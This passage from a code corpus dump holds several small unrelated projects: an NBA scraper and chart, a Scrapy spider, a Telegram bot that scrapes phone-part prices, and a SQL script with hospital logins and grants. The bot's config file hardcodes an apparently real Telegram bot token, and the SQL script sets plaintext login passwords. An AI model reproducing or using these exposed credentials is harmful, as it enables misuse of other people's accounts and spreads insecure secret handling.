"text": "from bs4 import BeautifulSoup\nimport requests\nimport sqlite3\nimport json\nimport os\nfrom nba_api.stats.static import teams \n\n#creates the database, returns cur and conn paramters\ndef setUpDatabase():\n path = os.path.dirname(os.path.abspath(__file__))\n conn = sqlite3.connect(path+'/'+\"NBA_SCORES\")\n cur = conn.cursor()\n return cur, conn\n\n#takes in cur and conn, produces empty table for 2021 scores, returns nothing\ndef create_table_2021(cur, conn):\n cur.execute(\"DROP TABLE IF EXISTS Scores_2021\")\n cur.execute(\"CREATE TABLE Scores_2021 (game_id INTEGER PRIMARY KEY, Vistor_Score INTEGER, Home_Score INTEGER, Attendance INTEGER)\")\n conn.commit()\n#takes in cur and conn, produces empty table for 2020 scores, returns nothing\ndef create_table_2020(cur,conn):\n\n cur.execute(\"CREATE TABLE IF NOT EXISTS Scores_2020 (game_id INTEGER PRIMARY KEY, Visitor_id INTEGER, Vistor_Score INTEGER, Home_id INTEGER, Home_Score INTEGER, Page INTEGER)\")\n conn.commit()\n\ndef create_team_keys_table(cur, conn):\n cur.execute(\"DROP TABLE IF EXISTS Team_keys\")\n cur.execute(\"CREATE TABLE Team_keys (team_id INTEGER PRIMARY KEY, team_abrv TEXT)\")\n conn.commit()\n\n\n\n\n\n\n\n#accepts cur and conn, populates table from beautiful soup/basketball reference, returns nothing\ndef setUp2021Table(cur, conn):\n months = ['december', 'january', 'february', 'march']\n i = 0\n for month in months:\n url = f\"https://www.basketball-reference.com/leagues/NBA_2021_games-{month}.html\"\n\n r = requests.get(url)\n\n soup = BeautifulSoup(r.text, 'html.parser')\n\n \n table = soup.find('table')\n\n trs = table.find_all('tr')[2:]\n for tr in trs:\n hs = tr.find('td',{'data-stat':'visitor_pts'}).text\n vs = tr.find('td',{'data-stat':'home_pts'}).text\n atten = tr.find('td', {'data-stat':'attendance'}).text\n if atten=='':\n atten = '0'\n cur.execute(\"INSERT INTO Scores_2021 (game_id, Vistor_Score, Home_Score, Attendance) VALUES (?,?,?,?)\", (i, int(vs), int(hs), int(atten.replace(',', '')) ) )\n i+=1\n conn.commit()\n\n\n#accepts cur and conn, populates table from balldontlie, returns nothing\ndef setUp2020Table(cur, conn):\n cur.execute(\"SELECT MAX(Page) FROM Scores_2020\")\n \n n = cur.fetchone()[0]\n if(not n):\n n = 0\n page = n+1\n\n\n #each page contains exactly 25 game results\n r = requests.get(f\"https://www.balldontlie.io/api/v1/games?seasons[]=2019&page={page}\")\n games = json.loads(r.text)\n\n\n for game in games['data']:\n\n\n id_ = game.get('id', 0)\n hs = game.get('home_team_score', 0)\n vs = game.get('visitor_team_score', 0)\n hid = game.get('home_team',None).get('id',0)\n vid = game.get('visitor_team',None).get('id',0)\n cur.execute(\"INSERT INTO Scores_2020 (game_id , Visitor_id, Vistor_Score, Home_id, Home_Score, Page) VALUES (?,?,?,?,?,?)\", (id_, vid, vs, hid, hs, page))\n\n conn.commit()\n\n#accepts cur and conn, populates table from balldontlie to match team keys to names, returns nothing\ndef setUpTeamsTable(cur, conn):\n r = requests.get(\"https://www.balldontlie.io/api/v1/teams\")\n teams = json.loads(r.text)\n\n\n for team in teams['data']:\n\n\n id_ = team.get('id', 0)\n abrv = team.get('abbreviation', None)\n cur.execute(\"INSERT INTO Team_keys (team_id, team_abrv) VALUES (?,?)\", (id_, abrv))\n\n conn.commit()\n\n\n \n \n\n\n \n\n\n\n\n\n\n#def get_records(cur, conn):\n\n\n\n\ndef main():\n cur, conn = setUpDatabase()\n create_team_keys_table(cur,conn)\n create_table_2020(cur, conn)\n setUp2020Table(cur, conn)\n create_table_2021(cur, conn)\n setUp2021Table(cur, conn)\n setUpTeamsTable(cur, conn)\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5123584866523743,
"alphanum_fraction": 0.6662046909332275,
"avg_line_length": 65.56922912597656,
"blob_id": "7319bcdbdd0ef0461d12306c8ee07e4220237d69",
"content_id": "55e2d1a32054fe63f80afb37b0f83c6e7c0a315b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4329,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 65,
"path": "/NBA_visualizations_2020.py",
"repo_name": "ethanperlmuttter/PySlammaJamma",
"src_encoding": "UTF-8",
"text": "import plotly\nimport plotly.graph_objects as go \nimport plotly.express as px\nfrom bs4 import BeautifulSoup\nimport requests\nimport re\nimport os\nimport csv\nimport sqlite3\nimport json\n\n#API data from https://www.balldontlie.io/api/v1/games?seasons[]=2019&page={page}\n#Necessary file imports for Plotly file creation\n\n#Grouped Bar Chart for 2020 Home court PPG averages for all NBA teams\n#Grouped Bar Chart Plotly creation and line by line bar development for each NBA team, pulling\n#home court PPG averages from API gather\n\nteams = [\"NBA Team\"]\n\nfig = go.Figure(data=[\n go.Bar(name='Atlanta Hawks', x=teams, y=[114.58823529411765], marker_color = 'rgb(225,68,52)'),\n go.Bar(name='Boston Celtics', x=teams, y=[117.05714285714286], marker_color = 'rgb(0,122,51)' ),\n go.Bar(name='Brooklyn Nets', x=teams, y=[112.38888888888889], marker_color = 'rgb(0,0,0)'),\n go.Bar(name='Charlotte Hornets', x=teams, y=[104.2258064516129], marker_color = 'rgb(29,17,96)'),\n go.Bar(name='Chicago Bulls', x=teams, y=[106.11764705882354], marker_color = 'rgb(206,17,65)'),\n go.Bar(name='Clevland Cavaliers', x=teams, y=[108.55555555555556], marker_color = 'rgb(134,0,56)'),\n go.Bar(name='Dallas Mavericks', x=teams, y=[117.71052631578948], marker_color = 'rgb(0,83,188)'),\n go.Bar(name='Denver Nuggets', x=teams, y=[111.86111111111111], marker_color = 'rgb(13,34,64)'),\n go.Bar(name='Detroit Pistons', x=teams, y=[109.3030303030303], marker_color = 'rgb(200,16,46)'),\n go.Bar(name='Golden State Warriors', x=teams, y=[106.97058823529412], marker_color = 'rgb(29,66,138)'),\n go.Bar(name='Houston Rockets', x=teams, y=[119.0], marker_color = 'rgb(206,17,65)'),\n go.Bar(name='Indiana Pacers', x=teams, y=[110.75], marker_color = 'rgb(0,45,98)'),\n go.Bar(name='Los Angeles Clippers', x=teams, y=[117.76470588235294], marker_color = 'rgb(200,16,46)'),\n go.Bar(name='Los Angeles Lakers', x=teams, y=[113.58823529411765], marker_color = 'rgb(85,37,130)'),\n go.Bar(name='Memphis Grizzlies', x=teams, y=[113.19444444444444], marker_color = 'rgb(93,118,169)'),\n go.Bar(name='Miami Heat', x=teams, y=[115.75], marker_color = 'rgb(152,0,46)'),\n go.Bar(name='Milwaukee Bucks', x=teams, y=[120.97222222222223], marker_color = 'rgb(0,71,27)'),\n go.Bar(name='Minnesota Timberwolves', x=teams, y=[110.125], marker_color = 'rgb(12,35,64)'),\n go.Bar(name='New Orleans Pelicans', x=teams, y=[117.58333333333333], marker_color = 'rgb(180,151,90)'),\n go.Bar(name='New York Knicks', x=teams, y=[105.39393939393939], marker_color = 'rgb(0,107,182)'),\n go.Bar(name='Oklahoma City Thunder', x=teams, y=[113.16666666666667], marker_color = 'rgb(239,59,36)'),\n go.Bar(name='Orlando Magic', x=teams, y=[106.05714285714286], marker_color = 'rgb(0,125,197)'),\n go.Bar(name='Philadelphia 76ers', x=teams, y=[113.44117647058823], marker_color = 'rgb(237,23,76)'),\n go.Bar(name='Phoenix Suns', x=teams, y=[114.48717948717949], marker_color = 'rgb(29,17,96)'),\n go.Bar(name='Portland Trail Blazers', x=teams, y=[117.33333333333333], marker_color = 'rgb(224,58,62)'),\n go.Bar(name='Sacramento Kings', x=teams, y=[110.37142857142857], marker_color = 'rgb(91,43,130)'),\n go.Bar(name='San Antonio Spurs', x=teams, y=[114.73529411764706], marker_color = 'rgb(196,206,211)'),\n go.Bar(name='Toronto Raptors', x=teams, y=[114.97142857142858], marker_color = 'rgb(206,17,65)'),\n go.Bar(name='Utah Jazz', x=teams, y=[111.48571428571428], marker_color = 'rgb(0,71,27)'),\n go.Bar(name='Washington Wizards', x=teams, y=[114.0], marker_color = 'rgb(0,43,92)'),\n])\n# To alter bar presentation/add in title text and external features\nfig.update_layout(barmode='group')\nfig.update_layout(title_text='NBA 2020 Pre-COVID-19 Home Team PPG Averages')\nfig.show()\n\n#df = csv.read_csv(\"2020_home_ppg.csv\")\n#df = df[df['team_name'] == \"Atlanta Hawks\", \"Boston Celtics\", \"Brooklyn Nets\", \"Charlotte Hornets\", \"Chicago Bulls\", \"Cleveland Cavaliers\",\n#\"Dallas Mavericks\", \"Denver Nuggets\", \"Detroit Pistions\", \"Golden State Warriors\", \"Houston Rockets\", \"Indiana Pacers\", \"Los Angeles Clippers\",\n#\"Los Angeles Lakers\", \"Memphis Grizzlies\", \"Miami Heat\", \"Milwaukee Bucks\", \"Minnesota Timberwolves\", \"New Orleans Pelicans\", \"New York Knicks\",\n#\"Oklahoma City Thunder\", \"Orlando Magic\", \"Philadelphia 76ers\", \"Phoenix Suns\", \"Portland Trail Blazers\", \"Sacramento Kings\", \"San Antonio Spurs\",\n#\"Toronto Raptors\", \"Utah Jazz\", \"Washington Wizards\"]\n#df = df.groupby(['month', 'team_name'], as_index=False)[['Home_PPG']].avg()\n#print (df[:30])\n\n\n"
}
] | 6 |
F-WJ/ArticleSpider
|
https://github.com/F-WJ/ArticleSpider
|
35572484617cb0519533c05c9e9bd01e4563d50d
|
662fbd5cb4eadb8a8172551ecb56819c310c4a89
|
83454253dbd9f417fa7d787b9347bd5b42699cd5
|
refs/heads/master
| 2021-01-20T09:20:38.371943 | 2017-05-13T08:17:56 | 2017-05-13T08:17:56 | 90,240,833 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6453201770782471,
"alphanum_fraction": 0.6477832794189453,
"avg_line_length": 26.86206817626953,
"blob_id": "70be114a21142dc715df8d2bbcb5655d88e41461",
"content_id": "7b4f87c42aaed184bd47c3fed704a1e981c06d6e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 928,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 29,
"path": "/ArticleSpider/items.py",
"repo_name": "F-WJ/ArticleSpider",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\n# Define here the models for your scraped items\n#\n# See documentation in:\n# http://doc.scrapy.org/en/latest/topics/items.html\n\nimport scrapy\n\n\nclass ArticlespiderItem(scrapy.Item):\n # define the fields for your item here like:\n # name = scrapy.Field()\n pass\n\n\nclass JobBoleArticleItem(scrapy.Item):\n # items只有Field类型\n title = scrapy.Field() # 文章标题\n create_date = scrapy.Field() # 创建文章时间\n url = scrapy.Field() # 文章地址\n url_object_id = scrapy.Field() # 将url变成固定长度(将url变成md5)\n front_image_url = scrapy.Field() # 封面图\n front_image_path = scrapy.Field() # 图片本地存放地址\n praise_nums = scrapy.Field() # 点赞数\n comment_nums = scrapy.Field() # 评论数\n fav_nums = scrapy.Field() # 收藏数\n tags = scrapy.Field() # 文章标签\n content = scrapy.Field() # 文章内容\n\n\n\n\n"
},
{
"alpha_fraction": 0.5435356497764587,
"alphanum_fraction": 0.5857519507408142,
"avg_line_length": 20.05555534362793,
"blob_id": "1c684de679cd0510eb36040b86e284161f513517",
"content_id": "5ec7f2b237cc7bc44d2706432d16606aec9c9286",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 409,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 18,
"path": "/ArticleSpider/utils/common.py",
"repo_name": "F-WJ/ArticleSpider",
"src_encoding": "UTF-8",
"text": "# _*_ coding: utf-8 _*_\n__author__ = 'FWJ'\n__date__ = '17-5-2 下午8:02'\nimport hashlib\n\n\n# 将url变成md5\ndef get_md5(url):\n # 在python中,str就是unicode\n if isinstance(url, str):\n url = url.encode()\n m = hashlib.md5()\n m.update(url)\n return m.hexdigest()\n\n# python3要转utf8编码,python2不用\nif __name__ == \"__main__\":\n print(get_md5(\"http://jobbole.com\".encode(\"utf-8\")))\n"
}
] | 2 |
dazzeew/Async_bot
|
https://github.com/dazzeew/Async_bot
|
de83a2f778a2f130ffad026c61e5ac8b342a1fc4
|
01bbd0d46144d312d4f1fa2c25504048f57e02c9
|
e1f8f35b065d98d4f790b41308a96e9fa2953651
|
refs/heads/main
| 2023-05-30T13:23:32.688819 | 2021-06-14T16:52:31 | 2021-06-14T16:52:31 | 376,894,588 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6323529481887817,
"alphanum_fraction": 0.6323529481887817,
"avg_line_length": 32,
"blob_id": "fa48cc1105bdab591db11e47f9c64feabf8cfad4",
"content_id": "41b482fb3ed66211903247f03a596d2c48fb6cc0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 68,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 2,
"path": "/config.py",
"repo_name": "dazzeew/Async_bot",
"src_encoding": "UTF-8",
"text": "TOKEN = '1787109082:AAGeLqF-PJ-QpVtUYAkdIhZGZk36v_eaZjk'\r\ndef_url = \"https://novosibirsk.moba.ru/catalog/?\"\r\n"
},
{
"alpha_fraction": 0.6821106672286987,
"alphanum_fraction": 0.7168596982955933,
"avg_line_length": 28.84000015258789,
"blob_id": "03245744705979be69105fdbd92c37e744eabe68",
"content_id": "dfc51881c524ba05c6f8a51ec1c8a8fcc73d011c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 838,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 25,
"path": "/keyboards.py",
"repo_name": "dazzeew/Async_bot",
"src_encoding": "UTF-8",
"text": "from aiogram.types import ReplyKeyboardRemove, \\\r\n ReplyKeyboardMarkup, KeyboardButton\r\nmascom = ['Дисплей','Аккумулятор','Защитное стекло']\r\n\r\ndef main_keyboard():\r\n\tmain_kb = ReplyKeyboardMarkup(resize_keyboard=True)\r\n\tbtn1_1 = KeyboardButton(mascom[0])\r\n\tbtn1_2 = KeyboardButton(mascom[1])\r\n\tbtn1_3 = KeyboardButton(mascom[2])\r\n\tmain_kb.add(btn1_1,btn1_2).add(btn1_3)\r\n\treturn main_kb\r\n\r\ndef fstep_keyboard():\r\n\tfstep_kb = ReplyKeyboardMarkup(resize_keyboard=True)\r\n\tbtn2_1 = KeyboardButton('В главное меню')\r\n\tbtn2_2 = KeyboardButton('Назад')\r\n\tfstep_kb.add(btn2_1).add(btn2_2)\r\n\treturn fstep_kb\r\n\r\n\r\ndef sstep_keyboard():\r\n\tsstep_kb = ReplyKeyboardMarkup(resize_keyboard=True)\r\n\tbtn3_1 = KeyboardButton('В главное меню')\r\n\tsstep_kb.add(btn3_1)\r\n\treturn sstep_kb\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.6814576387405396,
"alphanum_fraction": 0.6856718063354492,
"avg_line_length": 36.769229888916016,
"blob_id": "49e37f3bb8e337898bd403e2d9248803d4041c4b",
"content_id": "a38b18e1343e93ebcec7b19e9ab7adf2d404f879",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4422,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 104,
"path": "/bot.py",
"repo_name": "dazzeew/Async_bot",
"src_encoding": "UTF-8",
"text": "from config import TOKEN\r\nfrom keyboards import main_keyboard, fstep_keyboard, sstep_keyboard, mascom\r\nfrom functions import url, Parcer, send_telegram\r\nfrom states_class import steps\r\n\r\n\r\nimport time\r\nfrom aiogram import Bot, Dispatcher, types, executor\r\nfrom aiogram.dispatcher import FSMContext\r\nfrom aiogram.dispatcher.filters.state import State\r\nfrom aiogram.contrib.fsm_storage.memory import MemoryStorage\r\nimport aiogram\r\n\r\nbot = Bot(TOKEN, parse_mode = 'HTML')\r\ndp = Dispatcher(bot, storage=MemoryStorage())\r\nchange_letter = 'Введите модель телефона или выберите команду'\r\n\r\nasync def anti_flood(*args, **kwargs):\t\r\n m = args[0]\r\n await m.answer(\"Не флуди :)\")\r\n\r\n\r\n\r\[email protected]_handler(commands = 'start', state = '*')\r\[email protected](anti_flood,rate=3)\r\nasync def wasup(message):\r\n\tawait message.reply(text = 'Привет, я пытаюсь заработать...\\nВыбери что-то из меню', reply_markup = main_keyboard())\r\n\tawait steps.change_zch.set()\r\n\r\[email protected]_handler(content_types = ['text'], state = steps.change_zch)\r\[email protected](anti_flood,rate=3)\r\nasync def main_change(message, state: FSMContext):\r\n\tif message.text == mascom[0]:\r\n\t\tawait message.answer(text = change_letter, reply_markup = sstep_keyboard())\r\n\t\tawait state.update_data(id = 'section_id=93&q=')\r\n\t\tawait steps.confirm_pars.set()\r\n\telif message.text == mascom[1]:\r\n\t\tawait message.answer(text = change_letter, reply_markup = sstep_keyboard())\r\n\t\tawait state.update_data(id = 'section_id=95&q=')\r\n\t\tawait steps.confirm_pars.set()\r\n\telif message.text == mascom[2]:\r\n\t\tawait message.answer(text = change_letter, reply_markup = sstep_keyboard())\r\n\t\tawait state.update_data(id = '&q=защитное+стекло+')\r\n\t\tawait steps.confirm_pars.set()\r\n\telse:\r\n\t\tawait message.answer(text = 'Упс....', reply_markup = main_keyboard())\r\n\t\treturn\r\n\r\n\r\[email protected]_handler(content_types = ['text'], state = steps.confirm_pars)\r\[email protected](anti_flood,rate=3)\r\nasync def pars_model(message, state: FSMContext):\r\n\tif message.text == 'В главное меню':\r\n\t\tawait message.answer(text = 'Выберите что-то из меню', reply_markup = main_keyboard())\r\n\t\tawait steps.change_zch.set()\r\n\telse:\r\n\t\tuser_data = await state.get_data()\r\n\t\tnew_url = url(message.text, user_data['id'])\r\n\t\tawait state.update_data(url = new_url)\r\n\t\tdictname = await Parcer(new_url)\r\n\t\tif dictname == {}:\r\n\t\t\tawait message.reply(text = 'К сожалению такой запчасти нету, попробуйте снова или нажмите вернитесь в главное меню')\r\n\t\t\treturn\r\n\t\tcounter = 1\r\n\t\tinfo = ''\r\n\t\tfor i in dictname:\r\n\t\t\t\tinfo += str(counter) + '. ' + i + ' \\n' + dictname.get(i)[1].text + '\\n\\n'\r\n\t\t\t\tcounter += 1\r\n\t\tinfo += 'Отправьте в чат номер запчасти, цену на замену которой вы бы хотели узнать'\r\n\t\tawait message.answer(text = info, reply_markup = fstep_keyboard())\r\n\t\tawait steps.choice_number.set()\r\n\r\[email protected]_handler(content_types = ['text'], state = steps.choice_number)\r\[email protected](anti_flood,rate=3)\r\nasync def number_detail(message, state: FSMContext):\r\n\tif message.text == 'В главное меню':\r\n\t\tawait message.answer(text = 'Выберите что-то из меню', reply_markup = main_keyboard())\r\n\t\tawait steps.change_zch.set()\r\n\telif message.text == 'Назад':\r\n\t\tawait message.reply(text = 'Введите модель телефона', reply_markup = sstep_keyboard())\r\n\t\tawait steps.confirm_pars.set()\r\n\telse:\r\n\t\tuser_data = await state.get_data()\r\n\t\tdictname = await Parcer(user_data['url'])\r\n\t\tcheck = True\r\n\t\tfor i in range(len(dictname)):\r\n\t\t\tif message.text == str(i + 1):\r\n\t\t\t\tcheck = False\r\n\t\t\t\tbreak\r\n\t\tif check:\r\n\t\t\tawait message.reply(text = 'Такого номера запчасти нет!!', reply_markup = fstep_keyboard())\r\n\t\t\treturn\r\n\t\tor_price = ['skip']\r\n\t\tfor i in dictname:\r\n\t\t\tor_price.append(i + ' (' + dictname.get(i)[0].text.replace(\" \", \"\") + \"Рублей)\\n\\n\")\r\n\t\tsend_orientir = str(or_price[int(message.text)])\r\n\t\tsend_telegram(str(or_price[int(message.text)]))\r\n\t\tawait message.answer(text = send_orientir + 'Для просмотра других цен, введите цифру', reply_markup = fstep_keyboard())\r\n\t\treturn\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\texecutor.start_polling(dp)\r\n\r\n"
},
{
"alpha_fraction": 0.7235293984413147,
"alphanum_fraction": 0.7235293984413147,
"avg_line_length": 26,
"blob_id": "64531c764323a6d4123187ef0ec9c9b1f50a6d8e",
"content_id": "aff52f691373635e54f9bc7f6038b28b58f62d73",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 170,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 6,
"path": "/states_class.py",
"repo_name": "dazzeew/Async_bot",
"src_encoding": "UTF-8",
"text": "from aiogram.dispatcher.filters.state import State, StatesGroup\r\n\r\nclass steps(StatesGroup):\r\n\tchange_zch = State()\r\n\tconfirm_pars = State()\r\n\tchoice_number = State()\r\n\r\n"
},
{
"alpha_fraction": 0.8113207817077637,
"alphanum_fraction": 0.8113207817077637,
"avg_line_length": 52,
"blob_id": "f731a8de25c970241495f09be74cb4c181c9bc1c",
"content_id": "6f5f23c76141e7706250325540e330baaff180d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 184,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 2,
"path": "/README.md",
"repo_name": "dazzeew/Async_bot",
"src_encoding": "UTF-8",
"text": "# Async_bot\nМеханизм парсинга и словаря во втором случае реализован убого, тк он каждый раз парсит заново\n"
},
{
"alpha_fraction": 0.5966697335243225,
"alphanum_fraction": 0.6003700494766235,
"avg_line_length": 21.45652198791504,
"blob_id": "e1e13766a5be7dcd5ce4706e62a88650d648d86e",
"content_id": "63acb239b8275accf22aa3fe540ceb229ef74bbf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1081,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 46,
"path": "/functions.py",
"repo_name": "dazzeew/Async_bot",
"src_encoding": "UTF-8",
"text": "from config import def_url\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nfrom aiogram import types\r\nimport time\r\n\r\nfrom config import TOKEN\r\n\r\n\r\n\r\ndef url(text,id_pars):\r\n\tmodel = ''\r\n\tfor i in range(len(text)):\r\n\t\tif text[i] == ' ':\r\n\t\t\tmodel += '+'\r\n\t\telse: \r\n\t\t\tmodel += text[i]\r\n\tnew_url = def_url + id_pars + model + '&how=r'\r\n\treturn new_url\r\n\r\nasync def Parcer(url):\r\n\tdictname = dict()\r\n\tsoup = BeautifulSoup(requests.get(url).text, 'html.parser')\r\n\tname = soup.find_all('a', class_=\"dark_link\")\r\n\tprice = soup.find_all('span', class_=\"price_value\")\r\n\tavailability = soup.find_all('div', class_=\"item-stock\")\r\n\tfor i in range(len(price)):\r\n\t\tdictname[name[i].text] = [price[i], availability[i]]\r\n\treturn dictname \r\n\r\n\r\n\r\n\r\ndef send_telegram(text: str):\r\n url = \"https://api.telegram.org/bot\"\r\n channel_id = \"@testbot_mic\"\r\n url += TOKEN\r\n method = url + \"/sendMessage\"\r\n\r\n r = requests.post(method, data={\r\n \"chat_id\": channel_id,\r\n \"text\": text\r\n })\r\n\r\n if r.status_code != 200:\r\n raise Exception(\"post_text error\")\r\n\r\n"
}
] | 6 |
LEOBox/FinalProject
|
https://github.com/LEOBox/FinalProject
|
e62ab82d3baf502b4f0ce80d09cf546ec6ba0c59
|
a4e001f66d584aa9e0a03f8aa7fb075181e512df
|
2a86ba2c71fa1bcda5eb6af9cc899d59848521fb
|
refs/heads/master
| 2021-01-01T03:35:51.836901 | 2016-04-29T16:44:21 | 2016-04-29T16:44:21 | 56,215,224 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6589326858520508,
"alphanum_fraction": 0.6612529158592224,
"avg_line_length": 17.782608032226562,
"blob_id": "cd294b4390a115a4ebfd942a188708280d32457c",
"content_id": "b40cdaccefea39c6174d6413f133790ee9bc2004",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 431,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 23,
"path": "/Front-End/webserver.py",
"repo_name": "LEOBox/FinalProject",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom flask import Flask,render_template\n\napp = Flask(__name__)\n\[email protected]('/')\ndef function():\n\treturn render_template('index.html')\n\[email protected]('/login')\ndef login():\n\treturn render_template('login.html')\n\[email protected]('/register')\ndef register():\n\treturn render_template('register.html')\n\[email protected]('/bill')\ndef bill():\n\treturn render_template('bill.html')\n\nif __name__ == '__main__':\n\tapp.run(debug=True)"
},
{
"alpha_fraction": 0.697762668132782,
"alphanum_fraction": 0.7557241916656494,
"avg_line_length": 38.97382354736328,
"blob_id": "fdc4898c26a3169b209c62c250a306c386f2388c",
"content_id": "4de23e2523b323ead28a705595e2638da5bafee1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 7643,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 191,
"path": "/LOGINS,GRANT.sql",
"repo_name": "LEOBox/FinalProject",
"src_encoding": "UTF-8",
"text": "/*Stored procedure or function on nurseschedule table*/\n/*If nurse enter her id and password then if she wants to check her shift timings*/\nuse hospital;\nselect * from Nurse;\nselect * from NurseSchedule;\ncreate proc dbo.NurseTimings\n@Id nvarchar(20)\nAS\nselect Nurse.Nurse_ID,FirstName,LastName,StartTime,EndTime,Date\nfrom Nurse inner join NurseSchedule on Nurse.Nurse_ID = NurseSchedule.Nurse_ID\nwhere Nurse.Nurse_ID = @Id;\n\nEXEC dbo.NurseTimings 5;\n\n\n/* Using functions*/\ncreate function fnnurseshifttime\n (@Id nvarchar(20))\n returns table\n\nreturn\n (select Nurse.Nurse_ID,FirstName,LastName,StartTime,EndTime,Date\nfrom Nurse inner join NurseSchedule on Nurse.Nurse_ID = NurseSchedule.Nurse_ID\nwhere Nurse.Nurse_ID = @Id)\n\nselect * from\nfnnurseshifttime(6);\n/*If nurse wants to check the health attributes of patient along with his details*/\nuse hospital;\nselect * from Health_Attribute;\ncreate proc dbo.ChkPatientHealthDetails\n@Id nvarchar(20)\nAS\nselect Patient.Patient_ID,FirstName,LastName,Systolic_BP,Diastolic_BP,BloodSugar,Pulse\nfrom Health_Attribute inner join Patient on Patient.Patient_ID=Health_Attribute.Patient_ID\nwhere Patient.Patient_ID = @Id;\n\nEXEC dbo.ChkPatientHealthDetails 5;\n\n\n/*Using Grant permissions*/\n/*Giving grant permission for doctor on patient table and on health attribute table*/\n\nCREATE LOGIN TESTF0 WITH PASSWORD = 'abc@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN TESTF1 WITH PASSWORD = 'def@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN TESTF2 WITH PASSWORD = 'ghi@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN TESTF3 WITH PASSWORD = 'jkl@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN TESTF4 WITH PASSWORD = 'mno@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN TESTF5 WITH PASSWORD = 'pqr@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN TESTF6 WITH PASSWORD = 'stu@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN TESTF7 WITH PASSWORD = 'vwx@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN TESTF8 WITH PASSWORD = 'xyz@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN TESTF9 WITH PASSWORD = 'adc@12345',\nDEFAULT_DATABASE = hospital;\n\ncreate user TESTF0 for login TESTF0 with Default_Schema = dbo;\ncreate user TESTF1 for login TESTF1 with Default_Schema = dbo;\ncreate user TESTF2 for login TESTF2 with Default_Schema = dbo;\ncreate user TESTF3 for login TESTF3 with Default_Schema = dbo;\ncreate user TESTF4 for login TESTF4 with Default_Schema = dbo;\ncreate user TESTF5 for login TESTF5 with Default_Schema = dbo;\ncreate user TESTF6 for login TESTF6 with Default_Schema = dbo;\ncreate user TESTF7 for login TESTF7 with Default_Schema = dbo;\ncreate user TESTF8 for login TESTF8 with Default_Schema = dbo;\ncreate user TESTF9 for login TESTF9 with Default_Schema = dbo;\n\nGrant insert,select,update,delete on Patient to TESTF0,TESTF1,TESTF2,TESTF3,TESTF4,TESTF5,TESTF6,TESTF7,TESTF8,TESTF9;\nGrant select on Health_Attribute to TESTF0,TESTF1,TESTF2,TESTF3,TESTF4,TESTF5,TESTF6,TESTF7,TESTF8,TESTF9;\n\nselect * from Nurse;\nUpdate Nurse SET FirstName = 'NURSE0' where FirstName = 'TESTF0';\nUpdate Nurse SET FirstName = 'NURSE1' where FirstName = 'TESTF1';\nUpdate Nurse SET FirstName = 'NURSE2' where FirstName = 'TESTF2';\nUpdate Nurse SET FirstName = 'NURSE3' where FirstName = 'TESTF3';\nUpdate Nurse SET FirstName = 'NURSE4' where FirstName = 'TESTF4';\nUpdate Nurse SET FirstName = 'NURSE5' where FirstName = 'TESTF5';\nUpdate Nurse SET FirstName = 'NURSE6' where FirstName = 'TESTF6';\nUpdate Nurse SET FirstName = 'NURSE7' where FirstName = 'TESTF7';\nUpdate Nurse SET FirstName = 'NURSE8' where FirstName = 'TESTF8';\nUpdate Nurse SET FirstName = 'NURSE9' where FirstName = 'TESTF9';\n\nCREATE LOGIN NURSE0 WITH PASSWORD = 'abc@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN NURSE1 WITH PASSWORD = 'def@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN NURSE2 WITH PASSWORD = 'ghi@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN NURSE3 WITH PASSWORD = 'jkl@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN NURSE4 WITH PASSWORD = 'mno@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN NURSE5 WITH PASSWORD = 'pqr@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN NURSE6 WITH PASSWORD = 'stu@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN NURSE7 WITH PASSWORD = 